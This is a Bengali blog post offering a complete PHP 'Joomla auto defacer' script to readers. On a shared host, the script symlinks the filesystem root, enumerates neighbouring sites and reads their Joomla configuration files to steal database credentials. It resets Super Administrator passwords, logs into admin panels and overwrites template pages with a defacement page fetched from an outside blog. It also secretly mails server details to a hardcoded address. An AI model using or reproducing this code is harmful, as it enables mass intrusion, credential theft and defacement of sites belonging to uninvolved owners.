joomla auto defacer

0
371
joomla auto defacer

নাদিম জোবায়ের

যাহারা আমাকে চিনেন সেটা ভাল না চিনলে আরও ভাল :P
joomla auto defacer

অনেক দিন আগে আমাদের তেরক ভাই একটা স্ক্রিপ্ট বানাইছিল :) joomla auto defacer দিয়া দিলাম সবার জন্য ।


<?
//joomla auto defacer
//coded by Force Ex

ini_set("display_errors", "0");
set_time_limit(0);
@session_start();
echo "

AUTOMATIC JOOMLA DEFACER

";
echo "

CODED BY : ECF

";
echo "

ECF

";
echo "

http://blog.ecf.me

";
//mail feature
$body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);

$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);

//create symlink of / to /ecf/root/
@mkdir('ecf',0777);
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$fp = @fopen ('ecf/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','ecf/root');
//collecting site names
$text=file_get_contents($base_url.'/ecf/root/var/named/');
$ar = explode('

  • <a href="', $text);
    for($vi=2;$vi < count($ar);$vi++)
    {
    $var1 = strtok($ar[$vi], " ");
    $var1 = substr($var1,0,-2);
    $old=('.db');
    $new=('');
    $sites = str_replace($old , $new , $var1);
    $filename = 'sites.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $sites."\n");
    fclose($fp);
    }

    //collecting domainuser names for sites
    $domainusers=file('sites.txt');
    foreach ($domainusers as $domainuser) {
    $textexec=("ls -la /etc/valiases/".$domainuser);
    $exec=exec($textexec);
    $filename = 'lsla.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $exec."\n");
    fclose($fp);
    }

    //creating final domain and domain user list
    $lsla=file('lsla.txt');
    foreach ($lsla as $finaldom) {
    $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
    $site=substr(strstr($finaldom, '/etc/valiases'),14);

    $filename = 'bhung.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $user.":". $site." ");
    fclose($fp);

    }

    $f=file_get_contents('bhung.txt');
    $finals=explode(" ",$f);
    foreach ($finals as $final){
    $strlen=('6');
    $dr=strlen ($final);
    if ($dr < $strlen) {

    $filename = 'faltu.txt';
    $fp = fopen($filename, "a");
    $write = fputs($fp, $final);
    fclose($fp);
    }
    else {
    $filename = 'gold.txt';
    $fp = fopen($filename, "a");
    $write = fputs($fp, $final."\n");
    fclose($fp);
    }

    }
    //delete ajaira text files
    unlink ('bhung.txt');
    unlink ('faltu.txt');
    unlink ('lsla.txt');
    unlink ('sites.txt');

    $h=file_get_contents('http://blog.ecf.me');
    $url=($base_url);
    $a=file($base_url.'/gold.txt');
    echo ("

    ");

    foreach ($a as $final) {
    list($user, $site_url) = explode(":", $final);
    $site_urlto = substr($site_url, 0, -1);
    $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
    $configs=file_get_contents($url2);
    $old=('$');
    $new=('ecf');
    $configfile = str_replace($old , $new , $configs);
    $username=entre2v2($configfile, "ecfuser = '","';");
    $password=entre2v2($configfile, "ecfpassword = '","';");
    $dbname=entre2v2($configfile, "ecfdb = '","';");
    $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");

    $strlendbprefix= strlen ($dbprefix);
    if ($strlendbprefix > 2) {
    $link=mysql_connect("localhost",$username,$password) ;

    mysql_select_db($dbname,$link) ;

    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");

    //checking pass change
    $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
    $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
    $showpass=mysql_fetch_array ($checkpass);
    if ($showpass[0]== $reqpass) {

    $filename = 'passchanged.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $site_url."\n");
    fclose($fp);
    //upto this alright
    $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");

    $co=randomt();

    if ( $req )
    {

    $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
    $data = mysql_fetch_array($req);
    $template_name=$data["template"];

    $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
    $data = mysql_fetch_array($req);
    $template_id=$data["extension_id"];

    $urlto=$site_urlto."/administrator/index.php";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);

    $buffer = curl_exec($ch);

    $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
    $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

    ///////////////////////////
    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,"com_config");
    if($pos === false) {

    }
    else {
    }
    ///////////////////////////
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
    if($hidden2) {
    }
    else {

    }
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");

    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,'

    ');
    if($pos === false) {
    echo "
    Domain User Website Name CMS Status
    $user $site_url Joomla Failed

    ";
    }
    else {
    $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
    $filename = 'deftemp.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $deftempurl."\n");
    fclose($fp);

    echo "

    $user $site_url Joomla Defaced

    ";

    }

    }

    else
    {

    $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
    $data = mysql_fetch_array($req);
    $template_name=$data["template"];

    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,"com_config");

    if($pos === false) {

    }
    else {
    }
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);

    if($hidden2) {

    }
    else {

    }

    $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,'

    ');
    if($pos === false) {
    echo "
    $user $site_url Joomla Failed

    ";
    }
    else {
    $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
    $filename = 'deftemp.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $deftempurl."\n");
    fclose($fp);

    echo "

    $user $site_url Joomla Defaced

    ";

    }

    }

    //upto this alright

    }
    else {
    }
    }
    else {
    }
    }

    $cntpasschanged=file('passchanged.txt');
    $countpasschanged= count ($cntpasschanged);

    echo("
    ");
    $defacedurl=('View List of Defaced Site
    ');
    $passchangedurl=('View List of Password Changed site
    ');
    echo "

    $defacedurl $passchangedurl

    ";

    //declaring function entre2v2
    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
    }

    function randomt() {

    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '' ;

    while ($i

  • pastebin লিংক

    http://pastebin.com/qT4RFAyh

    একটি উত্তর ত্যাগ